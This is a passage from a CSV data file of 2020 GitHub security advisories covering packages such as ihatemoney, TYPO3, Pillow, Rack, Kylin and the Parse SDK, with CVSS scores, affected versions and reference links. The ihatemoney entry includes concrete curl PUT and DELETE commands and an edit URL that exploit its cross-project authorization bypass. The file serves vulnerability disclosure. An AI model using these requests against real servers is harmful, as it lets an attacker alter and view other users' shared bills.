+* Open an issue in [the repo](https://github.com/Bouke/django-two-factor-auth)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django-two-factor-auth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.12.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Bouke/django-two-factor-auth/security/advisories/GHSA-vhr6-pvjm-9qwf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15105'}, {'type': 'WEB', 'url': 'https://github.com/Bouke/django-two-factor-auth/commit/454fd9842fa6e8bb772dbf0943976bc8e3335359'}, {'type': 'WEB', 'url': 'https://github.com/Bouke/django-two-factor-auth/blob/master/CHANGELOG.md#112---2020-07-08'}]","{'cwe_ids': ['CWE-312'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-10T20:52:31Z', 'nvd_published_at': None}"
+1.4.0,GHSA-67j9-c52g-w2q9,2021-01-07T23:46:05Z,2020-07-27T17:47:52Z,,['CVE-2020-15120'],Authorization Bypass in I hate money,"### Impact
+An authenticated member of one project can modify and delete members of another project, without knowledge of this other project's private code. This can be further exploited to access all bills of another project without knowledge of this other project's private code.
+
+With the default configuration, anybody is allowed to create a new project. An attacker can create a new project and then use it to become authenticated and exploit this flaw. As such, the exposure is similar to an unauthenticated attack, because it is trivial to become authenticated.
+
+### Patches
+```diff
+ ihatemoney/models.py | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/ihatemoney/models.py b/ihatemoney/models.py
+index fe7b519..5691c75 100644
+--- a/ihatemoney/models.py
++++ b/ihatemoney/models.py
+@@ -380,7 +380,7 @@ class Person(db.Model):
+ def get_by_name(self, name, project):
+ return (
+ Person.query.filter(Person.name == name)
+- .filter(Project.id == project.id)
++ .filter(Person.project_id == project.id)
+ .one()
+ )
+
+@@ -389,7 +389,7 @@ class Person(db.Model):
+ project = g.project
+ return (
+ Person.query.filter(Person.id == id)
+- .filter(Project.id == project.id)
++ .filter(Person.project_id == project.id)
+ .one()
+ )
+
+```
+
+### Workarounds
+
+To limit the impact, it is possible to disable public project creation by setting `ALLOW_PUBLIC_PROJECT_CREATION = False` in the configuration (see [documentation](https://ihatemoney.readthedocs.io/en/latest/configuration.html)). Existing users will still be able to exploit the flaw, but this will prevent an external attacker from creating a new project.
+
+### For more information
+
+`Person.query.get()` and `Person.query.get_by_name()` were mistakenly running a database join on the Project table without constraining the result.
+
+As a result, `Person.query.get(42, ""projectfoo"")` would return the Person with id=42, even if it is not associated to the project ""projectfoo"". The only condition is that ""projectfoo"" must exist.
+
+This flaw can be exploited in several places:
+
+1) API: PUT requests to `/api/projects//members/` will succeed even though `` is not a member of ``.
+
+ This allows an authenticated attacker to alter the state of a member (name, weight, activated) in any project. In addition, the altered member will no longer be associated with its original project but will be associated to the attacker project instead, breaking many features of IHateMoney. For instance, bills referencing the altered member will no longer be visible in the original project.
+
+ This causes an additional information disclosure and loss of integrity on bills: the attacker will now be able to see, edit and delete bills belonging to the altered member, because IHateMoney now believes that these bills are associated to the attacker project through the altered member.
+
+ For instance, assume that `Person(id=42)` is a member of project ""targetProject"", and that the attacker has access to another project ""attackerProject"" with the private code ""attackerPassword"". The attacker can modify `Person(id=42)` with this command:
+
+ $ curl -X PUT -d ""name=Pwn3d&activated=1"" --basic -u attackerProject:attackerPassword http://$SERVER/api/projects/attackerProject/members/42
+
+ The attacker can now see, edit and delete bills paid by `Person(id=42)` by simply browsing to http://$SERVER/attackerProject/
+
+2) Editing a member through the web interface at `//members//edit` will succeed even though `` is not a member of ``.
+
+ This is very similar to the PUT exploit. Reusing the same example, the attacker needs to login to its ""attackerProject"" project with the private code ""attackerPassword"". It can then alter the state of `Person(id=42)` by accessing the edit form at the following URL:
+
+ http://$SERVER/attackerProject/members/42/edit
+
+ Again, as a result of the alteration, the altered member will become associated to the project ""attackerProject"", resulting in the same information disclosure and loss of integrity on bills.
+
+3) API: DELETE requests to `/api/projects//members/` will similarly allow to delete the member `` even if it belongs to a different project than ``.
+
+ $ curl -X DELETE --basic -u attackerProject:attackerPassword http://$SERVER/api/projects/attackerProject/members/42
+
+ The impact is less serious than with PUT, because DELETE only deactivates a member (it does not really delete it).
+
+All these exploits require authentication: an attacker needs to know a valid project name and its associated ""private code"". Once this requirement is fullfilled, the attacker can exploit this flaw to alter the state of members in any other project, without needing to know the target project name or its private code.
+
+`Person.query.get_by_name()` suffers from the same issue as `Person.query.get()`. It has an additional issue: if multiple Person objects with the same name exist (this is possible if they are associated to different projects), `get_by_name()` will crash with `MultipleResultsFound` because of the call to `one()`.
+
+However, since `Person.query.get_by_name()` is currently not used anywhere in IHateMoney, the bug affecting this function has no impact and is not exploitable.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ihatemoney'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/spiral-project/ihatemoney/security/advisories/GHSA-67j9-c52g-w2q9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15120'}, {'type': 'WEB', 'url': 'https://github.com/spiral-project/ihatemoney/commit/8d77cf5d5646e1d2d8ded13f0660638f57e98471'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-27T17:47:33Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m5vr-3m74-jwxp,2021-11-19T15:43:34Z,2020-07-29T16:15:19Z,,['CVE-2020-15098'],Missing Required Cryptographic Step Leading to Sensitive Information Disclosure in TYPO3 CMS,"> ### Meta
+> * CVSS: `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C` (8.2)
+> * CWE-325, CWE-20, CWE-200, CWE-502
+
+### Problem
+It has been discovered that an internal verification mechanism can be used to generate arbitrary checksums. This allows to inject arbitrary data having a valid cryptographic message authentication code (HMAC-SHA1) and can lead to various attack chains as described below.
+
+* [TYPO3-CORE-SA-2020-007](https://typo3.org/security/advisory/typo3-core-sa-2020-007), [CVE-2020-15099](https://nvd.nist.gov/vuln/detail/CVE-2020-15099): Potential Privilege Escalation
+ + the database server used for a TYPO3 installation must be accessible for an attacker (either via internet or shared hosting network)
+ + `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C` (7.5, high)
+* [TYPO3-CORE-SA-2016-013](https://typo3.org/security/advisory/typo3-core-sa-2016-013), [CVE-2016-5091](https://nvd.nist.gov/vuln/detail/CVE-2016-5091): Insecure Deserialization & Remote Code Execution
+ + an attacker must have access to at least one Extbase plugin or module action in a TYPO3 installation
+ + `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C` (9.1, critical)
+
+The overall severity of this vulnerability is **high (8.2)** based on mentioned attack chains and the requirement of having a valid backend user session (authenticated).
+
+### Solution
+Update to TYPO3 versions 9.5.20 or 10.4.6 that fix the problem described.
+
+### Credits
+Thanks to TYPO3 security team member Oliver Hader who reported and fixed the issue.
+
+### References
+* [TYPO3-CORE-SA-2020-008](https://typo3.org/security/advisory/typo3-core-sa-2020-008)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.20'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-m5vr-3m74-jwxp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-5091'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15098'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/commit/85d3e70dff35a99ef53f4b561114acfa9e5c47e1'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/TYPO3.CMS'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2016-013'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2020-008'}]","{'cwe_ids': ['CWE-20', 'CWE-200', 'CWE-325', 'CWE-327', 'CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-29T16:14:21Z', 'nvd_published_at': '2020-07-29T17:15:00Z'}"
+1.4.0,GHSA-9qcf-c26r-x5rf,2021-10-21T21:18:39Z,2020-07-01T17:55:03Z,,['CVE-2019-13990'],XML external entity injection in Terracotta Quartz Scheduler,initDocumentParser in xml/XMLSchedulingDataProcessor.java in Terracotta Quartz Scheduler through 2.3.0 allows XXE attacks via a job description.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.quartz-scheduler:quartz'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-13990'}, {'type': 'WEB', 'url': 'https://github.com/quartz-scheduler/quartz/issues/467'}, {'type': 'WEB', 'url': 'https://github.com/quartz-scheduler/quartz/pull/501'}, {'type': 'WEB', 'url': 'https://github.com/quartz-scheduler/quartz/commit/13c1d45aa1db15d0fa0e4997139c99ba219be551'}, {'type': 'PACKAGE', 'url': 'https://github.com/quartz-scheduler/quartz'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/172d405e556e2f1204be126bb3eb28c5115af91bcc1651b4e870bb82@%3Cdev.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/1870324fea41ea68cff2fd1bf6ee2747432dc1d9d22a22cc681e0ec3@%3Cdev.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/6b6e3480b19856365fb5eef03aa0915a4679de4b019a1e975502d949@%3Cdev.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/e493e718a50f21201e05e82d42a8796b4046e83f0d286b90e58e0629@%3Cdev.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/f74b170d3d58d7a24db1afd3908bb0ab58a3900e16e73275674cdfaf@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r21df13c8bd2c2eae4b9661aae814c4a2a814d1f7875c765b8b115c9a@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3a6884e8d819f32cde8c07b98934de3e80467859880f784950bf44cf@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re9b56ac1934d7bf16afc83eac1c39c98c1b20b4b15891dce923bf8aa@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20221028-0002/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGQUARTZSCHEDULER-461170'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-611'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-07-01T17:54:54Z', 'nvd_published_at': '2019-07-26T19:15:00Z'}"
+1.4.0,GHSA-57gr-jvqr-3hwm,2021-09-23T17:35:16Z,2020-07-29T18:07:38Z,,['CVE-2020-15513'],Incorrect access control in typo3_forum,The typo3_forum extension before 1.2.1 for TYPO3 has Incorrect Access Control.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'mittwald/typo3_forum'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15513'}, {'type': 'WEB', 'url': 'https://typo3.org/help/security-advisories'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2020-010'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-29T17:53:59Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9vfj-5g7h-4p24,2021-06-15T18:10:24Z,2020-07-29T18:08:48Z,,['CVE-2020-11994'],Server side template injection in Apache Camel,Server-Side Template Injection and arbitrary file disclosure on Camel templating components,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.camel:camel-robotframework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11994'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/d0e00f2e147a9e9b13a6829133092f349b2882bf6860397368a52600@%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0a406dc5a158fe6fab6ee85f6e082a8473c0c346b37db8cc7a4619e6%40%3Cdev.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGAPACHECAMEL-575542'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-29T18:06:56Z', 'nvd_published_at': '2020-07-08T16:15:00Z'}"
+1.4.0,GHSA-8843-m7mw-mxqm,2023-09-05T09:17:03Z,2020-07-27T21:52:41Z,,['CVE-2020-10379'],Buffer overflow in Pillow,"In Pillow before 7.1.0, there are two Buffer Overflows in `libImaging/TiffDecode.c`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10379'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/issues/4750'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/4538'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/46f4a349b88915787fea3fb91348bb1665831bbb#diff-9478f2787e3ae9668a15123b165c23ac'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commits/master/src/libImaging'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BEBCPE4F2VHTIT6EZA2YZQZLPVDEBJGD/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HOKHNWV2VS5GESY7IBD237E7C6T3I427/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/6.2.3.html'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/7.1.0.html'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-PILLOW-574577'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4430-2/'}]","{'cwe_ids': ['CWE-120'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-27T21:51:48Z', 'nvd_published_at': '2020-06-25T19:15:00Z'}"
+1.4.0,GHSA-cqhg-xjhh-p8hf,2023-09-05T09:19:22Z,2020-07-27T21:52:43Z,,['CVE-2020-10177'],Out-of-bounds reads in Pillow,Pillow before 7.1.0 has multiple out-of-bounds reads in `libImaging/FliDecode.c`.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10177'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/issues/4750'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/4503'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/4538'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commits/master/src/libImaging'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/08/msg00012.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BEBCPE4F2VHTIT6EZA2YZQZLPVDEBJGD/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HOKHNWV2VS5GESY7IBD237E7C6T3I427/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/6.2.3.html'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/7.1.0.html'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-PILLOW-574573'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4430-1/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4430-2/'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-27T21:52:00Z', 'nvd_published_at': '2020-06-25T19:15:00Z'}"
+1.4.0,GHSA-5f9h-9pjv-v6j7,2022-05-26T20:45:56Z,2020-07-06T21:31:02Z,,['CVE-2020-8161'],Directory traversal in Rack::Directory app bundled with Rack,A directory traversal vulnerability exists in rack < 2.2.0 that allows an attacker perform directory traversal vulnerability in the Rack::Directory app that is bundled with Rack which could result in information disclosure.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'rack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8161'}, {'type': 'WEB', 'url': 'https://github.com/rack/rack/commit/dddb7ad18ed79ca6ab06ccc417a169fde451246e'}, {'type': 'PACKAGE', 'url': 'https://github.com/rack/rack'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2020-8161.yml'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/ruby-security-ann/T4ZIsfRf2eA'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/rubyonrails-security/c/IOO1vNZTzPA'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/07/msg00006.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/01/msg00038.html'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4561-1/'}]","{'cwe_ids': ['CWE-22', 'CWE-548'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-06T21:30:32Z', 'nvd_published_at': '2020-07-02T19:15:00Z'}"
+1.4.0,GHSA-vc9j-fhvv-8vrf,2023-09-12T18:20:33Z,2020-07-27T19:55:52Z,,['CVE-2020-14000'],Remote Code Execution in scratch-vm,"MIT Lifelong Kindergarten Scratch scratch-vm before `0.2.0-prerelease.20200714185213` loads extension URLs from untrusted project.json files with certain `_` characters, resulting in remote code execution because the URL's content is treated as a script and is executed as a worker. The responsible code is `getExtensionIdForOpcode` in serialization/sb3.js. The use of `_` is incompatible with a protection mechanism in older versions, in which URLs were split and consequently deserialization attacks were prevented.
+
+**NOTE**: the scratch.mit.edu hosted service is not affected because of the lack of worker scripts.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'scratch-vm'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.0-prerelease.20200714185213'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.2.0-prerelease.20200709173451'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-14000'}, {'type': 'WEB', 'url': 'https://github.com/LLK/scratch-vm/pull/2476'}, {'type': 'WEB', 'url': 'https://github.com/LLK/scratch-vm/pull/2476/commits/90b9da45f4084958535338d1c4d71a22d6136aab'}, {'type': 'PACKAGE', 'url': 'https://github.com/LLK/scratch-vm'}, {'type': 'WEB', 'url': 'https://scratch.mit.edu/discuss/topic/422904/?page=1#post-4223443'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-07-27T19:53:24Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qwfw-gxx2-mmv2,2021-09-22T21:50:54Z,2020-07-27T22:51:37Z,,['CVE-2020-13925'],Command Injection in Kylin,"Similar to CVE-2020-1956, Kylin has one more restful API which concatenates the API inputs into OS commands and then executes them on the server; while the reported API misses necessary input validation, which causes the hackers to have the possibility to execute OS command remotely. Users of all previous versions after 2.3 should upgrade to 3.1.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.kylin:kylin-server-base'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13925'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r021baf9d8d4ae41e8c8332c167c4fa96c91b5086563d9be55d2d7acf@%3Ccommits.kylin.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r250a867961cfd6e0506240a9c7eaee782d84c6ab0091c7c4bc45f3eb%40%3Cuser.kylin.apache.org%3E'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGAPACHEKYLIN-584373'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-07-27T22:49:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-q7j5-9j77-g4gq,2021-07-29T20:50:40Z,2020-07-29T18:07:41Z,,['CVE-2020-15515'],Remote code execution in turn extension for TYPO3,The turn extension through 0.3.2 for TYPO3 allows Remote Code Execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'marcwillmann/turn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15515'}, {'type': 'WEB', 'url': 'https://typo3.org/help/security-advisories'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2020-011'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-29T18:00:39Z', 'nvd_published_at': '2020-07-07T16:15:00Z'}"
+1.4.0,GHSA-vjv6-gq77-3mjw,2023-06-27T20:27:43Z,2020-07-07T16:32:45Z,,['CVE-2020-15232'],XXE attack in Mapfish Print,"### Impact
+A user can do to an XML External Entity (XXE) attack with the provided SDL style.
+
+### Patches
+Use version >= 3.24
+
+### Workarounds
+No
+
+### References
+* https://cwe.mitre.org/data/definitions/611.html
+* https://github.com/mapfish/mapfish-print/pull/1397/commits/e1d0527d13db06b2b62ca7d6afb9e97dacd67a0e
+
+### For more information
+If you have any questions or comments about this advisory Comment the pull request: https://github.com/mapfish/mapfish-print/pull/1397
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.mapfish.print:print-lib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0'}, {'fixed': '3.24'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.mapfish.print:print-servlet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0'}, {'fixed': '3.24'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.mapfish.print:print-standalone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0'}, {'fixed': '3.24'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mapfish/mapfish-print/security/advisories/GHSA-vjv6-gq77-3mjw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15232'}, {'type': 'WEB', 'url': 'https://github.com/mapfish/mapfish-print/pull/1397'}, {'type': 'WEB', 'url': 'https://github.com/mapfish/mapfish-print/pull/1397/commits/e1d0527d13db06b2b62ca7d6afb9e97dacd67a0e'}, {'type': 'PACKAGE', 'url': 'https://github.com/mapfish/mapfish-print'}]","{'cwe_ids': ['CWE-611'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-07-07T16:32:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hg7c-66ff-9q8g,2020-07-31T16:18:53Z,2020-07-31T16:18:53Z,2020-07-31T16:18:53Z,[],Sandbox bypass in constantinople,constantinople before 3.1.1 affected by a sandbox bypass.,[],"[{'package': {'ecosystem': 'npm', 'name': 'constantinople'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pugjs/constantinople/commit/01d409c0d081dfd65223e6b7767c244156d35f7f'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1577703'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-hg7c-66ff-9q8g'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/568'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-16T03:01:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wvh7-5p38-2qfc,2021-09-22T21:05:43Z,2020-07-23T18:20:10Z,,[],Storing Password in Local Storage,"The `setPassword` method (http://parseplatform.org/Parse-SDK-JS/api/2.9.1/Parse.User.html#setPassword) stores the user's password in localStorage as raw text making it vulnerable to anyone with access to your localStorage. We believe this is the only time that password is stored at all. In the documentation under Users > Signing Up, it clearly states, ""We never store passwords in plaintext, nor will we ever transmit passwords back to the client in plaintext.""
+
+Example Code:
+```js
+async () => {
+ const user = Parse.User.current()
+ if (user) {
+ user.setPassword('newpass')
+ await user.save()
+ }
+}
+```
+After running the above code, the new password will be stored in localStorage as a property named ""password"".
+
+Proposed Solution:
+Before saving anything to localStorage, Parse should strip out any properties named ""password"" that are attempting to be stored with a Parse.User type object.
+
+Configuration:
+Parse SDK: 2.9.1
